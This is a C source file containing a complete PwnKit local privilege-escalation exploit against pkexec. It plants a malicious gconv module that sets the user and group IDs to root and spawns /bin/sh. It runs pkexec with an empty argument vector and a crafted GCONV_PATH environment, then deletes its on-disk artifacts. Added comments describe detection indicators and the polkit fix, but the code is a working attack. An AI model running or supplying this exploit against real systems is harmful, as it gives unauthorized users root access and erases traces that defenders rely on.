#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
/*
 * Stores the x86-64 glibc dynamic-loader path in an ELF ".interp" section.
 * NOTE(review): presumably this lets one object serve both as the shared
 * library that is loaded as a gconv module and as a directly startable
 * program; the build command is not shown here, so confirm. The loader path
 * is hard-coded for x86-64 Linux.
 */
const char service_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2"; // workaround noted by the author to make the object startable
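/*
 * Write `string` followed by a single newline to stdout.
 *
 * The original passed strlen(string) + 1 as the element count to fwrite(),
 * which also copied the terminating NUL byte into the output stream. Only the
 * visible characters and the newline are written here, so captured output
 * (logs, pipes, files) no longer contains embedded NUL bytes.
 *
 * string: NUL-terminated text; must not be NULL.
 */
void print(const char string[]) {
    fputs(string, stdout);
    fputc('\n', stdout);
}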
/*
 * Empty stub. glibc's iconv module loader looks up a `gconv` symbol in a
 * conversion module; this definition presumably exists only so that lookup
 * succeeds. All behaviour of the module is in gconv_init().
 */
void gconv() {} // intentionally empty
/*
 * Module initialiser: the code that runs once this object has been loaded as
 * a gconv module inside the target process.
 *
 * It prints a banner, sets the user and group IDs (real and effective) to 0
 * and then replaces the process image with /bin/sh, passing a fixed PATH as
 * the only environment variable. None of the set*id() or execve() return
 * values are checked.
 *
 * Defender note: the observable result is an `sh` process with uid 0 whose
 * parent chain leads back to pkexec started by an unprivileged user. Process
 * execution telemetry catches this even when the on-disk artifacts have been
 * removed again.
 */
void gconv_init() {
    char *shell_args[] = {"sh", NULL};
    char *shell_env[] = {
        "PATH=/bin:/usr/bin:/sbin:/usr/sbin",
        NULL
    };

    print("pwned lol !");

    /* Identity changes, in the same order as the original listing. */
    setuid(0);
    seteuid(0);
    setgid(0);
    setegid(0);

    execve("/bin/sh", shell_args, shell_env);
}
/*
 * Creates the working-directory layout that the rest of the program relies on.
 * `argv` is accepted but never read.
 *
 * Files and directories created, all relative to the current directory:
 *   - a directory literally named "GCONV_PATH=."
 *   - an executable, empty file "GCONV_PATH=./pwn"
 *   - a directory "pwn" holding a copy of pwnkit.so and a "gconv-modules"
 *     file that maps the charset name PWNKIT to the module "pwnkit"
 *
 * Defender note: a directory whose name starts with "GCONV_PATH=" and a
 * gconv-modules file outside the system gconv directory are strong
 * file-system indicators for this technique. clean() deletes them after the
 * run, so they are mostly useful for real-time file monitoring.
 *
 * NOTE(review): no return value is checked. If either fopen() fails, the
 * NULL stream is passed on to fileno()/fputs()/fclose(). The module is copied
 * by shelling out to /bin/cp through system().
 */
void setup(char *argv[]) {
    const mode_t dir_mode = S_IRWXU | S_IRWXG | S_IROTH | S_IXOTH;

    mkdir("GCONV_PATH=.", dir_mode);
    mkdir("pwn", dir_mode);

    /* Empty file inside the oddly named directory, marked executable. */
    FILE *marker = fopen("GCONV_PATH=./pwn", "w");
    struct stat marker_info;
    fstat(fileno(marker), &marker_info);
    fchmod(fileno(marker), marker_info.st_mode | S_IXUSR | S_IXGRP | S_IXOTH);
    fclose(marker);

    /* Expects a prebuilt pwnkit.so in the current directory. */
    system("/bin/cp pwnkit.so pwn/pwnkit.so");

    /* gconv-modules: both conversion directions point at the same module. */
    char *modules_text = "module PWNKIT// INTERNAL pwnkit 2\n"
                         "module INTERNAL PWNKIT// pwnkit 2";
    FILE *modules = fopen("pwn/gconv-modules", "w");
    fputs(modules_text, modules);
    fclose(modules);
}
/*
 * Deletes the files and directories created by setup(), files first and then
 * the directory that held them. Return values are ignored, so a missing entry
 * is silently skipped.
 *
 * Defender note: because the artifacts are removed after the run, a later
 * disk examination may find nothing. Rely on process and file-creation
 * telemetry recorded at the time rather than on leftover files.
 */
void clean() {
    static const struct {
        const char *path;
        int is_dir;
    } leftovers[] = {
        {"GCONV_PATH=./pwn", 0},
        {"GCONV_PATH=.", 1},
        {"pwn/pwnkit.so", 0},
        {"pwn/gconv-modules", 0},
        {"pwn", 1},
    };

    for (size_t i = 0; i < sizeof leftovers / sizeof leftovers[0]; i++) {
        if (leftovers[i].is_dir) {
            rmdir(leftovers[i].path);
        } else {
            remove(leftovers[i].path);
        }
    }
}
/*
 * Forks, runs /usr/bin/pkexec in the child with the given argument vector and
 * environment, waits for it in the parent, then removes the working files.
 *
 * env: environment passed to execve() unchanged.
 * arg: argument vector passed to execve() unchanged.
 *
 * An exit status of 127 or 1 is reported as "most likely patched". The status
 * is read with WEXITSTATUS() without a WIFEXITED() check. A failed fork()
 * (-1) also takes the parent path.
 * NOTE(review): if execve() fails, the child returns to the caller instead of
 * exiting.
 *
 * Defender note: the parent blocks in waitpid() for as long as the child
 * runs, so the clean-up happens only after the spawned process has ended.
 * While it runs, the artifacts from setup() are still on disk.
 */
void runAndClean(char * const env[], char * const arg[]) {
    int child = fork();

    if (child == 0) {
        execve("/usr/bin/pkexec", arg, env);
        return;
    }

    int wait_status;
    waitpid(child, &wait_status, 0);

    int exit_code = WEXITSTATUS(wait_status);
    if (exit_code == 127 || exit_code == 1) {
        print("[Pwnkit] Failed to execute pkexec, or it returned an error; your system is most likely patched!");
    }

    print("[Pwnkit] Cleaning up..");
    clean();
}
/*
 * Entry point: builds the directory layout, assembles the environment and the
 * empty argument vector, runs pkexec through runAndClean(), then terminates
 * with _exit(0). `argc` is unused.
 *
 * The two properties that matter for detection and hardening are visible here:
 *   - pkexec is started with an argument vector holding no entries at all
 *     (not even argv[0]);
 *   - the environment starts with a bare word that is not NAME=value, and its
 *     PATH value is itself the string "GCONV_PATH=.". CHARSET names the
 *     charset declared in the planted gconv-modules file.
 *
 * Defender note: a setuid program executed with an empty argv by an
 * unprivileged user is anomalous on its own and worth alerting on (for
 * example through execve auditing). The remedy is a polkit build that
 * contains the PwnKit fix. Where updating is not immediately possible,
 * removing the setuid bit from pkexec is the commonly documented stop-gap.
 */
int main(int argc, char *argv[]) {
    print("[Pwnkit] Setting up directory structure..");
    setup(argv);

    print("[Pwnkit] Setting up environment variables..");
    const char *pkexec_env[] = {
        "pwn",
        "PATH=GCONV_PATH=.",
        "CHARSET=pwnkit",
        "SHELL=pwn",
        "GIO_USE_VFS=",
        NULL
    };
    /* Deliberately empty: the terminator is the only element. */
    const char *pkexec_argv[] = { NULL };

    print("[Pwnkit] Pwning pkexec..");
    runAndClean(pkexec_env, pkexec_argv);

    _exit(0);
}